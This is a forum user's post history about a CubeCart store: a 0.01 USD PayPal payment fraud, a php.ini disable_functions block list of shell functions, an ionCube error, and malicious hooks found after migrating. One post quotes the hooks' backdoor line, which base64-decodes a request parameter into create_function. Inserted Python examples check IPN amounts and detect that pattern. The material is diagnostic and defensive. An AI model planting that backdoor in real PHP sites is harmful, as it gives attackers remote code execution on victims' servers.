Posts posted by jbranscum

  1. Greetings all

    I posted a GitHub issue but have not heard back so I'd like to see if there is prior experience with this.  My spouse has a CC store with embroidery designs; all digital downloads.  This morning a user rang up every single design in the store into a sale worth hundreds of dollars but only paid 0.01USD and CC approved it.

    I find it hard to believe I'm the first victim of this but I don't understand where things went wrong to allow a payment less than the order total to be approved; surely CC/PayPal Payment module would do a sanity check on the IPN data to make sure the amounts matched up.

    I'm not entirely sure what can be posted to ensure I'm not giving away too much information for some ne'er-do-well to capitalize on it.

    I checked the webserver logs and the IPN came directly from PayPal's server.

    Running CC 6.1.8 with PayPal Standard 1.0.5 on nginx using FastCGI+PHP.


    So.. What happened?  Where did it all go wrong?  How do I prevent this from happening in the future?
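
The amount sanity check the post asks about, as an added example that is not CubeCart's or the PayPal module's code (and is written in Python rather than the module's PHP): the fields of an IPN that has already been confirmed as genuine are compared with the stored order before it is marked paid. The IPN field names are PayPal's; the function name, the order layout and the sample values are assumptions constructed for illustration.

```python
from decimal import Decimal, InvalidOperation


def check_ipn_against_order(ipn, order, merchant_email, seen_txn_ids):
    """Return a list of reasons to refuse the payment; empty means it matches.

    Assumes the IPN was already confirmed as genuine with PayPal, which
    says who sent it but nothing about whether the amount is right.
    """
    problems = []
    if ipn.get("payment_status") != "Completed":
        problems.append("payment_status is not Completed")
    if ipn.get("receiver_email", "").lower() != merchant_email.lower():
        problems.append("payment was sent to a different receiver")
    if ipn.get("mc_currency") != order["currency"]:
        problems.append("currency differs from the order")
    try:
        # Decimal avoids float rounding when comparing money amounts.
        paid = Decimal(ipn.get("mc_gross", ""))
    except InvalidOperation:
        paid = None
    if paid is None or paid != Decimal(order["total"]):
        problems.append("mc_gross %r does not equal order total %s"
                        % (ipn.get("mc_gross"), order["total"]))
    if ipn.get("txn_id") in seen_txn_ids:
        problems.append("txn_id was already processed")
    return problems


# Constructed sample data: an order worth 412.50 and an IPN reporting 0.01.
ORDER = {"id": "constructed-1001", "total": "412.50", "currency": "USD"}
UNDERPAID_IPN = {
    "payment_status": "Completed",
    "receiver_email": "store@example.com",
    "mc_gross": "0.01",
    "mc_currency": "USD",
    "txn_id": "CONSTRUCTED-TXN-1",
}

if __name__ == "__main__":
    for reason in check_ipn_against_order(UNDERPAID_IPN, ORDER,
                                          "store@example.com", set()):
        print("refuse:", reason)
```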

  2. One more reply for anyone that is looking to secure their PHP installation in the future; add the following to your php.ini file:

    disable_functions = exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec

  3. Thanks for pointing out that there would be an associated file; May 13 2016.  Quite the coincidence that I'd happen to find the exploits exactly one year later.  Unfortunately I don't have the apache logs from that time to review what was done.

    Thanks again for the help.

  4. Both hooks are identical; the first is a very simple decode that does a lot of file manipulation.  The second one I don't have enough php wits to crack:

    $f = create_function('',base64_decode(strtr(str_replace(chr(10),'',$_REQUEST['c0d3']), '-_,', '+/=')));

    Something about replacing a newline but the rest doesn't make much sense in context.
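
What the one-liner above does, as an added example that is not from the original post or from CubeCart: the hook takes the `c0d3` request parameter, strips newlines, maps `-_,` back to `+/=`, base64-decodes the result and passes it to `create_function`, so whoever sends the request chooses the PHP that runs. The sketch below flags that pattern in hook source and decodes a value captured in a request log for reading only; the function names, regexes and sample log value are assumptions constructed for illustration.

```python
import base64
import re

# Sinks that turn a string into running PHP, and sources an HTTP client controls.
SINK = re.compile(r"\b(create_function|eval|assert)\s*\(", re.I)
SOURCE = re.compile(r"\$_(REQUEST|GET|POST|COOKIE|SERVER)\b")
DECODER = re.compile(r"\b(base64_decode|gzinflate|str_rot13|strtr)\s*\(", re.I)


def scan_php_source(text):
    """Return (line_number, verdict) for lines that build code from input."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not SINK.search(line):
            continue
        if SOURCE.search(line):
            findings.append((number, "request data reaches a code sink"))
        elif DECODER.search(line):
            findings.append((number, "decoded string reaches a code sink"))
    return findings


def decode_c0d3_parameter(value):
    """Undo the hook's transform on a value captured from a request log.

    Mirrors the PHP: drop chr(10), map '-_,' to '+/=', then base64-decode.
    The result is only returned for reading, never executed.
    """
    cleaned = value.replace("\n", "").translate(str.maketrans("-_,", "+/="))
    return base64.b64decode(cleaned).decode("utf-8", errors="replace")


# Constructed hook file: one benign line plus the line quoted in the post.
HOOK_SOURCE = r"""<?php
$label = base64_decode($row['label']);  // constructed benign line
$f = create_function('',base64_decode(strtr(str_replace(chr(10),'',$_REQUEST['c0d3']), '-_,', '+/=')));
"""
# Constructed log value: a harmless "echo 1;" in the hook's encoding.
LOGGED_VALUE = "ZWNobyAx\nOw,,"

if __name__ == "__main__":
    print(scan_php_source(HOOK_SOURCE))
    print(decode_c0d3_parameter(LOGGED_VALUE))
```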

  5. Hello all

    I recently made the switch from a modded v5 to 6.1.7 using these fantastic instructions from smither but I have a nagging sense that these two hooks I'm seeing may not be part of CC.  To my knowledge, my previous v5 modded site was never compromised and the only people that had access to it were myself, my spouse and the third party that did the aforementioned modding.  

    They were enabled after the update but I have since disabled them.  Thoughts?

    By the way; v6 runs very well on nginx with a few tweaks.

    EDIT: Never mind; I've answered my own question.  I decoded the hooks and they're both decidedly nefarious; looks like the store was compromised or the third party left us "presents".  No way of getting a time period on when they were added so it's hard to know if they were present for two weeks or two years.  There is a lot of file manipulation in the decoded script so I'm going to go with 'compromised site'.

  6. I downgraded to PHP 5.3 and just found ModsIndex has IP restricted my mods to the old server IP  :angry2:

    In the meantime, can y'all set me up with a temporary license key for testing on this domain I'm using?  test.www.cutebykira.com is the domain.  I would appreciate it.  Thank you.



  7. Good morning,

     

    I'm currently in the testing phase for moving my CubeCart installation to a new server.  The old server is running 5.2.2 and I was able to upgrade on the new installation to 5.2.14 with minimal issues.  After the install was complete, I got the dreaded blank page issue.  I enabled debugging and I am getting a bunch of these:

     

     

     

    ( ! ) Fatal error: The file /usr/home/kira/www.cutebykira.com/modules/plugins/social_links/hooks/class.gui.css.php was encoded by the ionCube Encoder for PHP 5 and cannot run under PHP 5.5 or PHP 5.6. Please ask the provider of the script to provide a version encoded with the ionCube Encoder for either PHP 5.3 or PHP 5.4 or PHP 5.5. in Unknown on line 0

    Call Stack
    #  Time    Memory   Function  Location
    1  0.0000  227992   {main}( )  ../index.php:0
    2  0.0003  256696   include( '/usr/home/kira/www/controllers/controller.master.inc.php' )  ../index.php:9
    3  0.0012  504136   include( '/usr/home/kira/www/controllers/controller.index.inc.php' )  ../php_5.4.php:434
    4  0.0143  2892328  GUI::getInstance( )  ../controller.index.inc.php:45
    5  0.0143  2894544  GUI->__construct( )  ../gui.class.php:236

     

    I hope I don't need to downgrade php in order to continue using CubeCart.

     

    Some info:

     

     

     

    Apache Version: Apache/2.4.10 (FreeBSD) PHP/5.6.2
    Apache API Version: 20120211
    Server Administrator: webmaster@
    Hostname:Port: test.www:0
    User/Group: www(80)/80
    Max Requests: Per Child: 0 - Keep Alive: on - Max Per Connection: 100
    Timeouts: Connection: 60 - Keep-Alive: 5
    Virtual Server: Yes
    Server Root: /usr/local
    Loaded Modules: core mod_so http_core worker mod_authn_file mod_authn_core mod_authz_host mod_authz_groupfile mod_authz_user mod_authz_core mod_access_compat mod_auth_basic mod_reqtimeout mod_filter mod_mime mod_log_config mod_env mod_headers mod_setenvif mod_version mod_unixd mod_status mod_autoindex mod_dir mod_alias mod_rewrite mod_php5

     

     

    [php Modules]

    bcmath
    bz2
    Core
    ctype
    curl
    date
    dom
    ereg
    filter
    ftp
    gd
    gettext
    hash
    iconv
    ionCube Loader
    json
    libxml
    mbstring
    mcrypt
    mhash
    mysql
    mysqli
    mysqlnd
    openssl
    pcre
    PDO
    pdo_mysql
    pdo_sqlite
    Phar
    posix
    Reflection
    session
    SimpleXML
    soap
    sockets
    SPL
    sqlite3
    standard
    tokenizer
    xdebug
    xml
    xmlreader
    xmlwriter
    Zend OPcache
    zlib
     
    [Zend Modules]
    Xdebug
    Zend OPcache
    the ionCube PHP Loader
     

     
